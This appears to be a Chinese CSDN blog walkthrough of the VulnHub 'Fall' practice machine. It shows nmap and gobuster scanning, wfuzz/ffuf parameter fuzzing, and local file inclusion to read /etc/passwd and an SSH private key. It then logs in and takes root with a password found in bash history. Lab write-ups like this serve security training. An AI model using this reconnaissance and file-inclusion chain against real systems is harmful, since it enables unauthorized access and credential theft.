• vulnhub之FALL


    vulnhub之fall
    下载地址
    难度:so easy
    主机发现

    netdiscover
    nmap -sP 192.168.2.0/24
    
    • 1
    • 2

    发现目的ip为192.168.2.5
    进行全端口扫描

    nmap -p- -T4 -A 192.168.2.5
    
    • 1

    在这里插入图片描述发现80端口开放网路服务,
    使用gobuster进行目录扫描

    gobuster dir -u http://192.168.2.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
    
    • 1

    在这里插入图片描述发现存在test.php,访问发现,页面提示需要参数,
    在这里插入图片描述这里采用fuzz探测所需参数,这里介绍两种方法,第一种是burpsuite设置参数进行暴力破解,第二种是采用wfuzz或者ffuf等工具进行实现,这里提供下简单的命令,详细使用方法会在下一篇进行描述
    字典文件自行获取

    wfuzz
    wfuzz -u 192.168.2.5/test.php?FUZZ=/etc/passwd  -w user.txt --hh 80
    ffuf
    ffuf -c -w user.txt -u 'http://192.168.2.5/test.php?FUZZ=/etc/passwd' -fs 80
    
    • 1
    • 2
    • 3
    • 4

    获取到参数为file

    在这里插入图片描述因为目标的ssh开放,这里尝试获取目标的用户名以及密码,使用文件包含查看目标的/etc/passwd文件
    在这里插入图片描述这里解释一下,由于/etc/passwd数据的划分,
    在这里插入图片描述由于qiu用户的命令解释器为/bin/bash,根据划分,qiu属于正常用户,所以采用该用户名进行利用
    ssh登录的话可以采取两种方式,第一种为账号密码,第二种为id_rsa即公钥私钥文件进行登录,这里获取qiu用户的id_rsa文件进行登录,使用文件包含获取文件,
    在这里插入图片描述保存为文件,这里命名为sskey,值得注意的是,需要全部复制,从——开始到——结束,然后使用命令ssh -i sskey qiu@192.168.2.5 进行登录
    在这里插入图片描述cat .bash_history 这里查看历史命令发现

    在这里插入图片描述echo "remarkablyawesomE" | sudo -S dnf update
    该命令为输入root用户密码,进行系统更新,所以这里的remarkablyawesomE为root密码,所以
    qiu用户sudo su切换root用户即可

  • 相关阅读:
    类与对象--末篇(c++)
    1-k8s常见注意事项
    【数据结构】栈
    oracle框架
    【GPGPU编程模型与架构原理】第一章 1.3 现代 GPGPU 产品
    MySQL DDL执行方式-Online DDL介绍
    pyautogui 和pynput学习总结
    【商业论证】
    基于B/S的旅游景点网站设计(Java+Web+MySQL)
    uniapp 集成蓝牙打印功能(个人测试佳博打印机)
  • 原文地址:https://blog.csdn.net/qq_54030686/article/details/127549066